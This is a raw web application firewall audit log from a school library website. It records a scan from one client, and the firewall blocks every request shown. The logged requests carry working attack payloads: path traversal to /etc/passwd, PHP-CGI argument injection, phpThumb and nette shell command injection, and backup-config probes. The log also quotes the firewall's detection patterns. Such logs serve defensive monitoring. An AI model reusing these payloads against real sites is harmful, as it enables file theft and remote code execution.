--bf84dd76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf84dd76-E-- --bf84dd76-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578223549309 1479 (- - -) Stopwatch2: 1745578223549309 1479; combined=492, p1=322, p2=143, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf84dd76-Z-- --cc277a67-A-- [25/Apr/2025:17:50:23 +0700] aAto7-XF4ZX3hX-IbN7iQgAAAIs 103.236.140.4 42952 103.236.140.4 8181 --cc277a67-B-- GET /download.php?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362568 --cc277a67-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cc277a67-E-- --cc277a67-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578223746952 1379 (- - -) Stopwatch2: 1745578223746952 1379; combined=426, p1=320, p2=79, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc277a67-Z-- --91cc3750-A-- [25/Apr/2025:17:50:23 +0700] aAto7-OdEP6frSVs8Cp47QAAAAI 103.236.140.4 42966 103.236.140.4 8181 --91cc3750-B-- GET /download.php?file=../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9362571 --91cc3750-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --91cc3750-E-- --91cc3750-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download.php?file=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578223944946 3276 (- - -) Stopwatch2: 1745578223944946 3276; combined=1093, p1=506, p2=558, p3=0, p4=0, p5=29, sr=134, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91cc3750-Z-- --0abada28-A-- [25/Apr/2025:17:50:24 +0700] aAto8OOdEP6frSVs8Cp47gAAABA 103.236.140.4 42966 103.236.140.4 8181 --0abada28-B-- GET /download_worksheet.php?action=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137269107 --0abada28-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0abada28-E-- --0abada28-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_worksheet.php?action=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578224144731 2351 (- - -) Stopwatch2: 1745578224144731 2351; combined=607, p1=450, p2=128, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0abada28-Z-- --f693960c-A-- [25/Apr/2025:17:52:23 +0700] aAtpZ-XF4ZX3hX-IbN7jFAAAAIo 103.236.140.4 44612 103.236.140.4 8181 --f693960c-B-- GET /config.inc.php.old HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270168 --f693960c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f693960c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578343814705 2003 (- - -) Stopwatch2: 1745578343814705 2003; combined=733, p1=346, p2=360, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f693960c-Z-- --6516dd40-A-- [25/Apr/2025:17:52:24 +0700] aAtpaOXF4ZX3hX-IbN7jFgAAAIA 103.236.140.4 44612 103.236.140.4 8181 --6516dd40-B-- GET /config.inc.php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270171 --6516dd40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6516dd40-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578344213489 1881 (- - -) Stopwatch2: 1745578344213489 1881; combined=730, p1=338, p2=365, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6516dd40-Z-- --f83a7678-A-- [25/Apr/2025:17:52:25 +0700] aAtpaeXF4ZX3hX-IbN7jHwAAAI0 103.236.140.4 44642 103.236.140.4 8181 --f83a7678-B-- GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363647 --f83a7678-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f83a7678-E-- --f83a7678-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578345618848 3773 (- - -) Stopwatch2: 1745578345618848 3773; combined=1983, p1=473, p2=1398, p3=0, p4=0, p5=112, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f83a7678-Z-- --e710af50-A-- [25/Apr/2025:17:52:26 +0700] aAtpauXF4ZX3hX-IbN7jJAAAAI4 103.236.140.4 44654 103.236.140.4 8181 --e710af50-B-- GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270192 --e710af50-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 
--e710af50-E-- --e710af50-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1745578346619366 1939 (- - -) Stopwatch2: 1745578346619366 1939; combined=584, p1=370, p2=178, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e710af50-Z-- --c69ad375-A-- [25/Apr/2025:17:52:28 +0700] aAtpbOOdEP6frSVs8Cp5zAAAABY 103.236.140.4 44668 103.236.140.4 8181 --c69ad375-B-- GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363668 --c69ad375-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c69ad375-E-- --c69ad375-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578348224542 2369 (- - -) Stopwatch2: 1745578348224542 2369; combined=812, p1=391, p2=384, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c69ad375-Z-- --3311e426-A-- [25/Apr/2025:17:52:29 +0700] aAtpbeOdEP6frSVs8Cp50AAAABU 103.236.140.4 44682 103.236.140.4 8181 --3311e426-B-- GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270212 --3311e426-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3311e426-E-- --3311e426-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578349021646 1789 (- - -) Stopwatch2: 1745578349021646 1789; combined=571, p1=358, p2=180, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3311e426-Z-- --5aaf0329-A-- [25/Apr/2025:17:52:29 +0700] aAtpbeOdEP6frSVs8Cp50wAAAA4 103.236.140.4 44682 103.236.140.4 8181 --5aaf0329-B-- GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363680 --5aaf0329-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5aaf0329-E-- --5aaf0329-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578349619453 1807 (- - -) Stopwatch2: 1745578349619453 1807; combined=561, p1=378, p2=147, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5aaf0329-Z-- --5a26f77e-A-- [25/Apr/2025:17:52:31 +0700] aAtpb-OdEP6frSVs8Cp53AAAABA 103.236.140.4 44712 103.236.140.4 8181 --5a26f77e-B-- GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 9363695 --5a26f77e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5a26f77e-E-- 
--5a26f77e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578351223926 1807 (- - -) Stopwatch2: 1745578351223926 1807; combined=598, p1=412, p2=159, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a26f77e-Z-- --8f63eb44-A-- [25/Apr/2025:17:52:31 +0700] aAtpb-OdEP6frSVs8Cp53QAAAA0 103.236.140.4 44712 103.236.140.4 8181 --8f63eb44-B-- GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 Accept-Encoding: gzip X-Varnish: 137270233 --8f63eb44-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8f63eb44-E-- --8f63eb44-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745578351422077 1849 (- - -) Stopwatch2: 1745578351422077 1849; combined=600, p1=428, p2=140, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f63eb44-Z-- --1da3fa35-A-- [25/Apr/2025:17:52:31 +0700] aAtpb-OdEP6frSVs8Cp53gAAAAk 103.236.140.4 44712 103.236.140.4 8181 --1da3fa35-B-- GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 164.92.74.66 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 164.92.74.66 